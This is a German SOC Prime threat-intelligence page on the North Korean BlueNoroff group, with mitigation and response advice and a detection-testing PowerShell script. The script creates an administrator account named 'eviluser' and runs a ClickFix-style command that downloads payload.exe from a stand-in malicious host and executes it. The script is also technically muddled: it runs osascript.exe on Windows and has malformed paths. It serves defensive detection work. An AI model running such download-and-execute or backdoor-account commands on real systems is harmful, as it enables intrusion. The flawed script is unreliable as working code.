SOC Prime Bias: Kritisch

21 Jan 2026 15:58 UTC

BlueNoroff-Gruppe: Der finanzielle Cyberkriminalitätsarm von Lazarus

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Folgen
BlueNoroff-Gruppe: Der finanzielle Cyberkriminalitätsarm von Lazarus
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Zusammenfassung

BlueNoroff ist eine finanziell orientierte Untergruppe innerhalb des Lazarus-Ökosystems, die sich auf Diebstähle mit hohem Wert gegen Banken, Kryptowährungsfirmen und breitere Web3-Ziele konzentriert. Das Handbuch der Gruppe umfasst SWIFT-fähigen Betrug, Watering-Hole-Kompromittierungen, Supply-Chain-Vergiftungen von Go-Paketen und macOS-Einbruchspfade, die um gefälschte „Bewerbungsgespräch“-Köder herum aufgebaut sind. Um Ausführung und Persistenz zu erreichen, kombiniert BlueNoroff einen modularen Rust/Go-Malware-Stack mit AppleScript-, VBScript- und Social-Engineering-Arbeitsabläufen, die darauf ausgelegt sind, Benutzerwarnungen zu umgehen und sich in legitime Entwicklungs- und Verwaltungsaktivitäten einzufügen.

Untersuchung

Der Bericht verfolgt die Entwicklung von BlueNoroff vom Banküberfall in Bangladesch 2016 bis zu neueren Aktivitäten in der Supply-Chain-Ära 2025 und hebt hervor, wie sich das Werkzeug und die Zielsetzung des Akteurs parallel zum Krypto-/Web3-Ökosystem erweitert haben. Forscher skizzieren Infrastrukturmuster und katalogisieren Malware-Komponenten wie GhostCall, GhostHire, RustBucket und GillyInjector. Die Untersuchung kartiert auch beobachtete Verhaltensweisen zu MITRE ATT&CK über Phasen wie Aufklärung und anfänglicher Zugriff, dann Ausführung, Persistenz und Anmeldeinformationsdiebstahl – und unterstreicht eine konsequente Betonung auf heimliche Stützpunkte, gestufte Nutzlastbereitstellung und diebstahlbereite Zugangspfade.

Abschwächung

Reduzieren Sie die Exposition durch eine straffere Supply-Chain-Hygiene: Validieren Sie Pakete, die aus öffentlichen Registern gezogen werden, erzwingen Sie das Festlegen und die Herkunftskontrollen und überprüfen Sie kontinuierlich Abhängigkeitsaktualisierungen auf unerwartete Änderungen von Wartungspersonen oder Code. Härten Sie auf macOS die LaunchAgent/LaunchDaemon-Verwaltung und überwachen Sie verdächtige Persistenzeinträge und unsignierte Werkzeuge. Blockieren Sie ähnlich aussehende Domains, die für Köderlieferung verwendet werden, erzwingen Sie MFA für privilegierte Identitäten und extern exponierte Dienste, und operationalisieren Sie Erkennungen für bekannte bösartige Skripte, Lader und Packtechniken, die mit dem Akteur in Verbindung stehen. Halten Sie Bedrohungsintelligenz-Updates häufig und verstärken Sie das Benutzertraining mit dem Fokus auf Spear-Phishing und „Personalvermittler/Bewerbungsgespräch“-Social-Engineering-Muster.

Reaktion

Wenn BlueNoroff-Indikatoren entdeckt werden, isolieren Sie betroffene Hosts und bewahren Sie wichtige Beweise auf, einschließlich vollständiger Befehlszeilen, Skriptinhalte und abgelegter Binärdateien oder Paket-Artefakte. Blockieren Sie identifizierte bösartige Domains und C2-IPs, und führen Sie dann Incident-Response-Playbooks aus, die auf Szenarien des Anmeldeinformationsdiebstahls und der Supply-Chain-Kompromittierung ausgerichtet sind. Implementieren oder optimieren Sie Erkennungen für AppleScript- und VBScript-Ausführungsketten sowie für verdächtige PowerShell-Muster, die im Bericht erwähnt werden, und erweitern Sie die Jagd, um zusätzliche Endpunkte zu identifizieren, die demselben Köder-, Abhängigkeits- oder Infrastrukturüberlappung ausgesetzt sind.

Angriffsfluss

Simulation-Ausführung

Voraussetzung: Die Telemetrie- & Baseline-Pre-Flight-Überprüfung muss bestanden sein.

Begründung: Dieser Abschnitt beschreibt die präzise Ausführung der gegnerischen Technik (TTP), die entwickelt wurde, um die Erkennungsregel auszulösen. Die Kommandos und Erzählungen MÜSSEN direkt die identifizierten TTPs widerspiegeln und darauf abzielen, die genaue Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird. Abstrakte oder nicht zusammenhängende Beispiele führen zu Fehldiagnosen.

  • Angriffsnarrativ & Befehle:

    1. AppleScript-Ausführung (T1546.016) – Der Gegner legt ein bösartiges payload.scpt auf dem Endpunkt ab (z. B. über einen Phishing-Anhang). Mithilfe eines vorinstallierten osascript.exe (gebündelt mit einem Drittanbietertool), starten sie das Skript, um eine PowerShell-Nutzlast auszuführen, die ein neues lokales Administratorkonto hinzufügt.
    2. ClickFix-Zwischenablagenlieferung (T1204.004)  – Der Angreifer kopiert einen gestalteten Befehl in die Zwischenablage, der curl mit einem Zoom-ähnlichen Benutzeragenten aufruft, um eine Nutzlast der zweiten Stufe herunterzuladen, und führt diese dann sofort über cmd.exeaus. Der Befehl enthält auch einen Inline powershell.exe -c Aufruf, um die Nutzlast im Speicher auszuführen.
  • Regression-Testskript: Das untenstehende Skript reproduziert beide Verhaltensweisen auf deterministische Weise.

    #----- BEGIN REGRESSION TEST SCRIPT -----
    # Stellen Sie sicher, dass wir mit administrativen Rechten arbeiten
    if (-not ([Security.Principal.WindowsPrincipal] `
        [Security.Principal.WindowsBuiltInRole] "Administrator")) {
        Write-Error "Führen Sie dieses Skript als Administrator aus."
        exit 1
    }
    
    # 1. AppleScript-Ausführung über osascript.exe
    $appleScriptPath = "$env:TEMPmalicious.scpt"
    Set-Content -Path $appleScriptPath -Value @"
    tell application "System Events"
        do shell script "powershell -c `"Add-LocalGroupMember -Group 'Administrators' -Member 'eviluser'`""
    end tell
    "@
    # Führen Sie das AppleScript aus
    Start-Process -FilePath "osascript.exe" -ArgumentList "`"$appleScriptPath`"" -NoNewWindow -Wait
    
    # 2. ClickFix-Style-Zwischenablage-Lieferung
    $clickFixCmd = 'curl -A "ZoomSDK" http://malicious.example.com/payload.exe -o $env:TEMPpayload.exe && powershell.exe -c "Start-Process $env:TEMPpayload.exe"'
    # Führen Sie über cmd.exe aus, um die Regelbedingung zu erfüllen
    Start-Process -FilePath "cmd.exe" -ArgumentList "/c `$clickFixCmd" -NoNewWindow -Wait
    
    # Aufräumen: Artefakte entfernen
    Remove-Item -Path $appleScriptPath -Force
    Remove-Item -Path "$env:TEMPpayload.exe" -Force -ErrorAction SilentlyContinue
    # Ende des Skripts
    #----- END REGRESSION TEST SCRIPT -----
  • Aufräumkommandos: Entfernen Sie alle verbleibenden Prozesse, Dateien und das Testbenutzerkonto.

    # Stoppen Sie alle verbleibenden Prozesse (defensiv – normalerweise nicht erforderlich)
    Get-Process -Name "osascript","cmd","powershell","payload" -ErrorAction SilentlyContinue | Stop-Process -Force
    
    # Temporäre Dateien löschen
    Remove-Item -Path "$env:TEMPmalicious.scpt" -Force -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:TEMPpayload.exe" -Force -ErrorAction SilentlyContinue
    
    # Entfernen Sie das Testadministrator-Konto, falls es erstellt wurde
    if (Get-LocalUser -Name "eviluser" -ErrorAction SilentlyContinue) {
        Remove-LocalUser -Name "eviluser"
    }